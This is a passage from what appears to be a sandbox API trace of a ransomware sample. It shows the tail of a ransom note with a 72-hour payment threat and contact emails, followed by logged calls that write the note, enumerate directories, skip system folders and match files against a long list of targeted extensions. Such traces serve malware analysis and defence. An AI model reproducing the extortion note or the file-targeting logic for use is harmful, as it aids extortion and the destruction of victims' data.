payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0170.141] WriteFile (in: hFile=0x388, lpBuffer=0x189b24*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0x189b24*, lpNumberOfBytesWritten=0x18a648*=0x808, lpOverlapped=0x0) returned 1
	[0170.145] CloseHandle (hObject=0x388) returned 1
	[0170.145] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.146] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x189b0c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x189b0c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0170.146] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0170.146] GetUserNameA (in: lpBuffer=0x1899f0, pcbBuffer=0x189b08 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x189b08) returned 1
	[0170.148] wsprintfA (in: param_1=0x18a538, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.148] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0170.148] SetFilePointer (in: hFile=0x388, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0170.148] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0170.148] WriteFile (in: hFile=0x388, lpBuffer=0x18a538*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18a650, lpOverlapped=0x0 | out: lpBuffer=0x18a538*, lpNumberOfBytesWritten=0x18a650*=0x43, lpOverlapped=0x0) returned 1
	[0170.149] CloseHandle (hObject=0x388) returned 1
	[0170.162] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ef1402f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.162] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*") returned 48
	[0170.162] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.162] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\INT\\*.*", cchLength=0x30 | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*") returned 0x30
	[0170.162] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="windows") returned 0x0
	[0170.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="boot") returned 0x0
	[0170.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.163] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="system volume information") returned 0x0
	[0170.163] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.164] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.164] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="temp") returned 0x0
	[0170.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.164] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="program files") returned 0x0
	[0170.164] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.164] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.165] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.165] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="appdata") returned 0x0
	[0170.165] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.165] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="application data") returned 0x0
	[0170.165] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.192] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="winnt") returned 0x0
	[0170.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="tmp") returned 0x0
	[0170.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="cache") returned 0x0
	[0170.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.193] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.193] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="webcache") returned 0x0
	[0170.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="inetcache") returned 0x0
	[0170.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.194] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="nvidia") returned 0x0
	[0170.194] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="packages") returned 0x0
	[0170.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="cookies") returned 0x0
	[0170.195] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.195] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\int\\*.*", lpSrch="programdata") returned 0x0
	[0170.195] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0170.195] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0170.196] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x35da50f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7ef1402f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.196] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0170.196] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eeee30c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7eeee30c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7ef1402f, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0170.196] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7eeee30c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7eeee30c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7eeee30c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0170.196] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1
	[0170.196] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x972ca54f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5ed8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 0
	[0170.196] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0170.198] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0170.199] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="production", cAlternateFileName="PRODUC~1")) returned 1
	[0170.199] lstrcmpW (lpString1="production", lpString2="..") returned 1
	[0170.199] lstrcmpW (lpString1="production", lpString2=".") returned 1
	[0170.199] lstrcpyW (in: lpString1=0x18b58c, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL"
	[0170.199] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\"
	[0170.199] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\", lpString2="production" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production"
	[0170.200] lstrcpyW (in: lpString1=0x18aa84, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production"
	[0170.200] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\"
	[0170.200] lstrcpyW (in: lpString1=0x18a674, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\"
	[0170.200] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*"
	[0170.200] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*" (normalized: "c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*"), lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0170.201] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*") returned 55
	[0170.201] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.201] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\*.*", cchLength=0x37 | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*") returned 0x37
	[0170.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.201] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="windows") returned 0x0
	[0170.201] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.202] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="boot") returned 0x0
	[0170.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.202] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="system volume information") returned 0x0
	[0170.202] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.202] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0170.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.203] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="temp") returned 0x0
	[0170.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.203] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="program files") returned 0x0
	[0170.203] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.203] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="program files (x86)") returned 0x0
	[0170.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="appdata") returned 0x0
	[0170.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="application data") returned 0x0
	[0170.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.204] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="winnt") returned 0x0
	[0170.204] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="tmp") returned 0x0
	[0170.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="cache") returned 0x0
	[0170.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.205] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="temporary internet files") returned 0x0
	[0170.205] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="webcache") returned 0x0
	[0170.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="inetcache") returned 0x0
	[0170.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.206] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="nvidia") returned 0x0
	[0170.206] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="packages") returned 0x0
	[0170.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="cookies") returned 0x0
	[0170.207] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.207] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\*.*", lpSrch="programdata") returned 0x0
	[0170.207] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd06144, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5b9d2ab4, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5b9d2ab4, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0170.207] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35da50f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x972ca54f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x9940c797, ftLastWriteTime.dwHighDateTime=0x1d75217, nFileSizeHigh=0x0, nFileSizeLow=0x6988, dwReserved0=0x0, dwReserved1=0x0, cFileName="ppcrlconfig600.dll", cAlternateFileName="PPCRLC~1.DLL")) returned 1
	[0170.208] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2="..") returned 1
	[0170.208] lstrcmpW (lpString1="ppcrlconfig600.dll", lpString2=".") returned 1
	[0170.208] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\"
	[0170.208] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\", lpString2="ppcrlconfig600.dll" | out: lpString1="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll") returned="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll"
	[0170.208] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll") returned 70
	[0170.208] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0170.208] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\IdentityCRL\\production\\ppcrlconfig600.dll", cchLength=0x46 | out: lpsz="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll") returned 0x46
	[0170.208] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.209] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll", lpSrch="help_decrypt_your_files") returned 0x0
	[0170.209] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll" | out: lpString1="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll") returned="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll"
	[0170.209] lstrlenW (lpString="c:\\users\\all users\\microsoft\\identitycrl\\production\\ppcrlconfig600.dll") returned 70
	[0170.209] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0170.209] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.210] StrStrW (lpFirst=".dll", lpSrch=".") returned=".dll"
	[0170.210] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0170.210] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.op